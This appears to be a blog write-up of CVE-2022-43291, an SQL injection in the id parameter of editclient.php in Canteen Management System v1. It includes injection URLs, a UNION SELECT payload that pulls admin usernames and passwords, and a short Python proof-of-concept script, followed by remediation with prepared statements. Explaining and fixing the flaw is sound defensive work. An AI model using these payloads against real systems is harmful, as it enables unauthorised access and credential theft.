CVE-2022-43291 - SQL Injection in Canteen Management System v1. (`/youthappam/editclient.php` id Parameter) – Analysis, Exploit & Remediation

In 2022, a serious SQL injection vulnerability (CVE-2022-43291) was found in Canteen Management System v1.. This bug lets attackers mess with the database just by tweaking a URL parameter. In this post, we break down what happened, how the exploit works, show code snippets, and suggest ways to fix it so others can learn from it.

Product: Canteen Management System v1.

- Vulnerable File: /youthappam/editclient.php

Parameter: id

- Type: SQL Injection (OWASP Top 10)
- CVE: CVE-2022-43291

Summary:
A user-controlled id parameter is not sanitized before it is used directly in a SQL query. This means an attacker can inject SQL, potentially exposing or destroying sensitive data.

Here’s an example of vulnerable code inside editclient.php

<?php
// Vulnerable snippet
include('db.php');
$id = $_GET['id'];
$query = "SELECT * FROM clients WHERE id = $id";
$result = mysqli_query($con, $query);
// ... display client info for editing ...
?>

Issue:
The id comes straight from the URL, e.g. /youthappam/editclient.php?id=1 and gets inserted into the query with no checks. If someone sends a crafted parameter, the SQL can be changed.

Just navigate to the following URL

http://server/youthappam/editclient.php?id=1

Now, try inputting SQL code

http://server/youthappam/editclient.php?id=1 OR 1=1

This would modify the query to

SELECT * FROM clients WHERE id = 1 OR 1=1

Which basically returns all clients, not just the one with id=1.

The parameter can be manipulated to extract data or even perform blind SQL injection. For example

http://server/youthappam/editclient.php?id=1 UNION SELECT 1, username, password FROM admin--

If not protected, this can return admin usernames and passwords, as the SQL query now looks like

SELECT * FROM clients WHERE id = 1 UNION SELECT 1, username, password FROM admin--

Exploit PoC Script (Python)

Below is a simple exploit script to confirm the vulnerability. This example just retrieves data using a basic payload.

import requests

# Target URL
url = "http://server/youthappam/editclient.php";

# SQLi payload (change as needed)
payload = '1 UNION SELECT 1, username, password FROM admin-- '

# Send GET request
params = {'id': payload}
response = requests.get(url, params=params)

# Print results
print(response.text)

⚠️ Warning: Never use this on systems you do not own or do not have permission to test!

Responsible Disclosure & References

- NVD CVE-2022-43291 entry
- Exploit Database listing *(if available)*
- OWASP SQL Injection

1. Use Prepared Statements

The right way to defend against SQL injection is to use prepared statements. Here’s how you fix the vulnerable code:

<?php
// Secure snippet
include('db.php');
$id = $_GET['id'];
$stmt = $con->prepare("SELECT * FROM clients WHERE id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();
$result = $stmt->get_result();
// ... display client info for editing ...
?>

Always check that user input is the right type and in the right range

$id = intval($_GET['id']);

3. Limit Database Permissions

The database account used by your app should have only the rights it needs, and no more.

Regularly audit your code for vulnerabilities like SQL injection.

- Keep libraries/frameworks up to date.

Final Thoughts

CVE-2022-43291 is a textbook example of SQL injection, yet these bugs keep popping up in the wild. The fix isn’t complicated, but it’s vital. If you run Canteen Management System v1., update your code right now and check for unprotected inputs elsewhere in your site.

Stay safe, code safe.

*If this helped or you have questions, let us know below!*

References:
- NVD CVE-2022-43291
- OWASP SQL Injection Cheat Sheet

Timeline

Published on: 11/09/2022 15:15:00 UTC
Last modified on: 11/10/2022 15:01:00 UTC